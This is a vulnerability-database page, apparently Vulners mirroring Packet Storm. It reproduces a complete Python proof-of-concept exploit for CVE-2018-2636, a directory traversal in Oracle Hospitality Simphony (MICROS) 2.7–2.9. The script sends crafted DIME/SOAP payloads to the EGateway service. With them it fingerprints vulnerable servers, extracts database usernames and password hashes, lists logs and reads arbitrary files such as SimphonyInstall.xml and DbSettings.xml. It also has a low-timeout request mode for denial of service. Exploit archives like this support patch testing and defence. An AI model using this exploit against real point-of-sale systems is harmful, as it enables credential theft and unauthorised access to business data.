Vulners
Lucene search
Oracle Hospitality Simphony (MICROS) 2.9 Directory Traversal
🗓️ 03 Feb 2018 00:00:00Reported by Dmitry ChastuhinType 
packetstorm🔗 packetstormsecurity.com👁 71 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal Exploit | 2 Feb 201800:00 | – | zdt |
 | Exploit for CVE-2018-2636 | 6 Jul 202502:42 | – | gitee |
 | CVE-2018-2636 | 2 Feb 201800:00 | – | circl |
 | Unspecified Vulnerability in Oracle Hospitality Simphony (CNVD-2018-02252) | 17 Jan 201800:00 | – | cnvd |
 | Oracle Hospitality Simphony Remote Code Execution (CVE-2018-2636) | 25 Jun 202000:00 | – | checkpoint_advisories |
 | CVE-2018-2636 | 18 Jan 201802:00 | – | cve |
 | CVE-2018-2636 | 18 Jan 201802:00 | – | cvelist |
 | Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal | 2 Feb 201800:00 | – | exploitdb |
 | Oracle MICROS POS missing authorisation check | 21 Jul 201700:00 | – | erpscan |
 | Oracle Hospitality Simphony (MICROS) 2.7 2.9 - Directory Traversal | 2 Feb 201800:00 | – | exploitpack |
10
`# Exploit Title: Oracle Hospitality Simphony (MICROS) directory traversal
# Date: 30.01.2018
# Exploit Author: Dmitry Chastuhin (https://twitter.com/_chipik)
# Vendor Homepage: http://www.oracle.com/
# Version: 2.7, 2.8 and 2.9
# Tested on: Win, nix
# CVE : CVE-2018-2636
#!/usr/bin/env python
# https://twitter.com/_chipik
# Sorry for bad code practises. This is just a PoC, don't blame us very hard A-\_(a)_/A-
import requests
import argparse
import unicodedata
def rm_right(str):
rez=""
k=0
for i in range(len(str)):
rez = rez + str[k:k+2]
k=k+4
return rez
def add_right(str,char):
rez=""
k=0
for i in range(len(str)/2):
rez= rez + str[k:k+2]+char
k=k+2
return rez
def rm_left(str):
rez=""
k=2
for i in range(len(str)):
rez = rez + str[k:k+2]
k=k+4
return rez
def add_left(str,char):
rez=""
k=0
for i in range(len(str)/2):
rez= rez + char + str[k:k+2]
k=k+2
return rez
def send(data,dos=0):
if args.verb:
print "[DBG] \n"+data.encode("hex")
if dos:
try:
r = requests.post(base_uri, headers=headers, data=data, timeout=0.001)
except:
return
else:
r = requests.post(base_uri, headers=headers, data=data)
if r.status_code == 200:
if args.verb:
print "[DBG] HEX:"
print unicodedata.normalize('NFKD', r.text).encode('ascii','ignore').encode("hex")
print "\n[DBG] RAW:\n"+r.text
print ""
return unicodedata.normalize('NFKD', r.text).encode('ascii','ignore')
else:
print "[DBG] status code: %d" % r.status_code
print "[DBG] text : %s" % repr(r.text)
def calculate_len(filename):
len2 = (len(filename)+8)/2
len1 = len2 + 8
len0 = len1 + 124
if args.verb:
print "len2="+str('{0:02x}'.format(len2))
print "len1="+str('{0:02x}'.format(len1))
print "len0="+str('{0:04x}'.format(len0))
return str('{0:04x}'.format(len0)),str('{0:02x}'.format(len1)),str('{0:02x}'.format(len2))
def cli_info():
print "[*] Let's get info about server"
poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
poc_suf1='\x0a\x10\x00\x00\x00\x10\x00\x18\x00\x00\x00\x84\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x01\xe1\x1e\x02\x00\x00\x00\x36\x00\x00\x00\x3c\x00\x53\x00\x49\x00\x2d\x00\x53\x00\x65\x00\x63\x00\x75\x00\x72\x00\x69\x00\x74\x00\x79\x00\x20\x00\x56\x00\x65\x00\x72\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x3d\x00\x22\x00\x32\x00\x22\x00\x20\x00\x2f\x00\x3e\x00\x58\x52\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1d\xb8\x58\x00\x00\xb1\x36\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02'
poc = poc_pref+poc_body+poc_suf1
full_rez = send(poc)
return full_rez
def cli_dbinfo():
print "[*] Let's get DB creds"
poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
poc_suf1='\x0a\x10\x00\x00\x00\x10\x00\x18\x00\x00\x00\xa0\x73\x71\x33\x49\x71\x35\x50\x54\x74\x66\x32\x6b\x42\x73\x53\x48\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x01\xe1\x1e\x02\x00\x00\x00\x36\x00\x00\x00\x3c\x00\x53\x00\x49\x00\x2d\x00\x53\x00\x65\x00\x63\x00\x75\x00\x72\x00\x69\x00\x74\x00\x79\x00\x20\x00\x56\x00\x65\x00\x72\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x3d\x00\x22\x00\x32\x00\x22\x00\x20\x00\x2f\x00\x3e\x00\xbd\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1d\x88\x96\x00\x00\x35\x53\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x24\x00\x00\x00\x0d\x00\x44\x62\x49\x6e\x66\x6f\x52\x65\x71\x75\x65\x73\x74\x01\x00\x00\x00\x01\x00\x06\x00\x6d\x53\x70\x61\x72\x65\x08\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02'
poc = poc_pref+poc_body+poc_suf1
full_rez = send(poc)
return full_rez
def cli_log_list():
print "[*] Let's get log list"
poc = "0c200000001000290000013872663850506e79467478667275366577687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f0000003c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d38223f3e3c736f61703a456e76656c6f706520786d6c6e733a736f61703d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d61223e3c736f61703a426f64793e3c50726f6365737344696d655265717565737420786d6c6e733d22687474703a2f2f6d6963726f732d686f7374696e672e636f6d2f45476174657761792f22202f3e3c2f736f61703a426f64793e3c2f736f61703a456e76656c6f70653e0a100000001000180000008e72663850506e794674786672753665776170706c69636174696f6e2f6f637465742d73747265616d01e11e02000000360000003c00530049002d00530065006300750072006900740079002000560065007200730069006f006e003d0022003200220020002f003e00a5980000000000000000000001c11c0100000001d11d98a20000b13600000100000000000000000000001e00000012000000050000000a000000240024006c006f0067001dd1021cc1021ee1020000"
full_rez = send(poc.decode("hex"))
return full_rez
def cli_read_log(filename):
log2="log\\"+filename
print "[*] Let's read %s" % log2
log = add_left(log2.encode("hex"),"00")
poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
poc_suf_1_1='0A100000001000180000'
poc_suf_1_ses='66497a3263516c56444c35305045356e'
poc_suf_1_2='6170706C69636174696F6E2F6F637465742D73747265616D01E11E02000000360000003C00530049002D00530065006300750072006900740079002000560065007200730069006F006E003D0022003200220020002F003E00C2AF0000000000000000000001C11C0100000001D11D8EBA0000B13600000100000000000000000000001E000000'
poc_suf_1_len0, poc_suf_1_len1, poc_suf_1_len2 = calculate_len(log)
poc_suf_1_3='00000006000000'
poc_suf_1_4='000000240024'
poc_suf1=(poc_suf_1_1+poc_suf_1_len0+poc_suf_1_ses+poc_suf_1_2+poc_suf_1_len1+poc_suf_1_3+poc_suf_1_len2+poc_suf_1_4).decode("hex")
poc_logname = log.decode("hex")
if len(log2) % 2 == 1:
poc_suf2='001dd1021cc1021ee1020000'.decode("hex")
else:
poc_suf2='001dd1021cc1021ee102'.decode("hex")
poc = poc_pref+poc_body+poc_suf1+poc_logname+poc_suf2
full_rez = send(poc)
return full_rez
def cal_tst():
file = "ServiceHostPrereq2012Sql\BootToDesktop.reg"
suf = file.encode('utf-16le')
print suf
pre = "\x0c \x00\x00\x00)\x00)\x00\x00\x04muuid:4382e7a6-607d-4392-b5df-d4b8bfcf4185\x00\x00\x00http://schemas.xmlsoap.org/soap/envelope/\x00\x00\x00"
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/03/addressing\" xmlns:wsse=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\" xmlns:wsu=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"><soap:Header><wsa:Action>http://micros-hosting.com/EGateway/ProcessDimeRequest</wsa:Action><wsa:MessageID>uuid:12e52d09-38dc-4071-810d-7ced9a3bfd59</wsa:MessageID><wsa:ReplyTo><wsa:Address>http://schemas.xmlsoap.org/ws/2004/03/addressing/role/anonymous</wsa:Address></wsa:ReplyTo><wsa:To>http://172.16.2.207:8080/EGateway/EGateway.asmx</wsa:To><wsse:Security><wsu:Timestamp wsu:Id=\"Timestamp-dd366974-3fbb-4e40-b868-ef9303548245\"><wsu:Created>2017-07-11T22:18:58Z</wsu:Created><wsu:Expires>2017-07-11T22:19:28Z</wsu:Expires></wsu:Timestamp></wsse:Security></soap:Header><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>"
suf_1 = "\x00\x00\x00\x0a\x10\x00\x00\x00)\x00\x18\x00\x00\x00\xf3uuid:d9706c6f-d103-45b2-9ca2-ec588dab1c7d\x00\x00\x00application/octet-stream\x01\xe1\x1e\x02\x00\x00\x00\x00\x00\x00\x00N\x1c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1dM\x1c\x01\x00kB\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\xad\x00\x00\x00\x01\x00\x00\x002\x00\x00\x00kB\x00\x00\x00\x00\x00\x00\x03\x01\x04\x8a\x15\x00\x00\x00\x11\x00\x00\x00\x18\x00\x00\x00W\x00o\x00r\x00k\x00s\x00t\x00a\x00t\x00i\x00o\x00n\x001\x00\\\x00\x00\x00"
suf_2 = "\x01\xadf\xd7\x00\x00\x00\x00\x00\x17t\x00\x00\x8e\x00\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02\x00"
rez_S = suf_1+suf+suf_2
data =pre+xml+rez_S
print suf.decode('utf-16le')
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-H', '--host', default='127.0.0.1', help='host')
parser.add_argument('-P', '--port', default='8080', help='port')
parser.add_argument('-i', '--info', action='store_true', help='information about micros installation')
parser.add_argument('-d', '--dbinfo' ,action='store_true', help='information about micros db (usernames and hashes)')
parser.add_argument('-l', '--log', action='store_true', help='information about log files')
parser.add_argument('-s', '--ssl', action='store_true', help='enable SSL')
parser.add_argument('-r', '--read', help='read file from server (root dir is c:\\. Ex.: windows\\win.ini) Also u can use 1 - for SimphonyInstall.xml and 2 - for DbSettings.xml' )
parser.add_argument('-v', '--verb', action='store_true', default=0, help='verb')
args = parser.parse_args()
headers = dict()
if args.ssl:
base_uri = 'https://%s:%s%s' % (args.host, args.port, '/EGateway/EGateway.asmx')
else:
base_uri = 'http://%s:%s%s' % (args.host, args.port, '/EGateway/EGateway.asmx')
headers['SOAPAction'] = '\"http://micros-hosting.com/EGateway/ProcessDimeRequest\"'
headers['Content-Type']= 'application/dime'
headers['Expect'] = '100-continue'
if args.info:
results = cli_info()
if results.find('\x00\x55\x00\x6e\x00\x61\x00\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x69\x00\x7a\x00\x65\x00\x64') != -1:
print "[*] Your instance is not vulnerable to CVE-2018-2636"
else:
print "[!] Your instance is vulnerable to CVE-2018-2636"
print results
exit()
if args.dbinfo:
print cli_dbinfo()
exit()
if args.log:
print cli_log_list()
exit()
if args.read:
if args.read == "1":
print cli_read_log("..\\..\\..\\SimphonyInstall.xml")
exit()
if args.read == "2":
print cli_read_log("..\\DbSettings.xml")
exit()
else:
print cli_read_log(args.read)
exit()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Feb 2018 00:00Current
8.1High risk
Vulners AI Score8.1
EPSS0.13977